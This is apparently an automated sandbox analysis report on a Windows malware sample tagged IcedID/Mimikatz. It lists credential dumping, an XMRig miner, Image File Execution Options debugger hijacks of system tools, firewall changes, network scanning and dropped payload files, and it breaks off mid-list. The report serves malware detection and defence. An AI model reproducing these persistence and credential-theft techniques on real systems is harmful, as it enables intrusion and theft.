Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 06:29
Behavioral task
behavioral1
Sample
2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe
-
Size
9.5MB
-
MD5
5242cb7276376a1f7dee2e4e7a049015
-
SHA1
86a73a07ae4831af2ccc756b1ecf5b13e35fa479
-
SHA256
44ad137982d58e91a006c2123cf2f53559a79ac57d8fcbed4869992a942957aa
-
SHA512
66ebb5342b271cb96b3d3072e4d656e681f926e7af42c77f1184696dee2c4277d07af5b404dd8b47c6d3b33ff862df4cbca8c541878f45dcb82d3b39ebeaa45f
-
SSDEEP
196608:7po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:agjz0E57/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2752 created 1868 2752 byuzvnr.exe 37 -
Xmrig family
-
Contacts a large (30047) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/1120-177-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-181-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-202-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-215-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-224-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-233-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-246-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-254-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-266-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-375-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-376-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig behavioral2/memory/1120-379-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1020-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1020-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000b000000023cad-6.dat mimikatz behavioral2/memory/4456-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/440-137-0x00007FF6370C0000-0x00007FF6371AE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts byuzvnr.exe File opened for modification C:\Windows\system32\drivers\etc\hosts byuzvnr.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2808 netsh.exe 4052 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 4456 byuzvnr.exe 2752 byuzvnr.exe 2848 wpcap.exe 3964 benegiqll.exe 440 vfshost.exe 2444 lllgdyunt.exe 2516 xohudmc.exe 4304 rwdxsq.exe 1120 uieubf.exe 4496 lllgdyunt.exe 2896 lllgdyunt.exe 4672 lllgdyunt.exe 3528 lllgdyunt.exe 3648 lllgdyunt.exe 4844 byuzvnr.exe 1640 lllgdyunt.exe 4768 lllgdyunt.exe 1668 lllgdyunt.exe 1600 lllgdyunt.exe 4360 lllgdyunt.exe 2188 lllgdyunt.exe 3296 lllgdyunt.exe 1252 lllgdyunt.exe 4512 lllgdyunt.exe 4656 lllgdyunt.exe 2800 lllgdyunt.exe 4856 ruznevtjd.exe 3320 byuzvnr.exe -
Loads dropped DLL 12 IoCs
pid Process 2848 wpcap.exe 2848 wpcap.exe 2848 wpcap.exe 2848 wpcap.exe 2848 wpcap.exe 2848 wpcap.exe 2848 wpcap.exe 2848 wpcap.exe 2848 wpcap.exe 3964 benegiqll.exe 3964 benegiqll.exe 3964 benegiqll.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 ifconfig.me 67 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\rwdxsq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 byuzvnr.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF byuzvnr.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft byuzvnr.exe File created C:\Windows\SysWOW64\rwdxsq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache byuzvnr.exe -
resource yara_rule behavioral2/memory/440-136-0x00007FF6370C0000-0x00007FF6371AE000-memory.dmp upx behavioral2/files/0x0007000000023d00-135.dat upx behavioral2/memory/440-137-0x00007FF6370C0000-0x00007FF6371AE000-memory.dmp upx behavioral2/files/0x0007000000023d0b-140.dat upx behavioral2/memory/2444-141-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/2444-159-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/files/0x0007000000023d08-163.dat upx behavioral2/memory/1120-164-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/4496-170-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/2896-174-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/1120-177-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/4672-179-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/1120-181-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/3528-184-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/3648-188-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/1640-196-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/4768-200-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/1120-202-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/1668-205-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/1600-209-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/4360-213-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/1120-215-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/2188-218-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/3296-222-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/1120-224-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/1252-227-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/4512-230-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/4656-232-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/1120-233-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/2800-235-0x00007FF664470000-0x00007FF6644CB000-memory.dmp upx behavioral2/memory/1120-246-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/1120-254-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/1120-266-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/1120-375-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/1120-376-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx behavioral2/memory/1120-379-0x00007FF6DD6A0000-0x00007FF6DD7C0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\hgpuenbvt\UnattendGC\specials\vimpcsvc.xml byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\Corporate\log.txt cmd.exe File created C:\Windows\hgpuenbvt\lzvztyutv\scan.bat byuzvnr.exe File created C:\Windows\klhnlzly\spoolsrv.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\svschost.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\Shellcode.ini byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\AppCapture64.dll byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\lzvztyutv\Result.txt ruznevtjd.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\tucl-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\spoolsrv.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\mimidrv.sys byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\wpcap.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\xdvl-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\spoolsrv.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\ip.txt byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\libeay32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\schoedcl.xml byuzvnr.exe File created C:\Windows\klhnlzly\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\mimilib.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\exma-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\tibe-2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\docmicfg.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\vimpcsvc.xml byuzvnr.exe File created C:\Windows\klhnlzly\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\ruznevtjd.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\spoolsrv.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\vimpcsvc.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\AppCapture32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\ucl.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\docmicfg.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\vfshost.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\posh-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\schoedcl.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\svschost.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\ssleay32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\schoedcl.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\svschost.xml byuzvnr.exe File created C:\Windows\klhnlzly\vimpcsvc.xml byuzvnr.exe File created C:\Windows\ime\byuzvnr.exe byuzvnr.exe File created C:\Windows\klhnlzly\byuzvnr.exe 2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\klhnlzly\byuzvnr.exe 2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\crli-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\libxml2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\svschost.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\trfo-2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\vimpcsvc.exe byuzvnr.exe File created C:\Windows\klhnlzly\svschost.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\upbdrjv\swrpwe.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\Packet.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\coli-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\zlib1.dll byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\lzvztyutv\Packet.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\cnli-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\trch-1.dll byuzvnr.exe File opened for modification C:\Windows\klhnlzly\spoolsrv.xml byuzvnr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4100 sc.exe 4852 sc.exe 752 sc.exe 4384 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 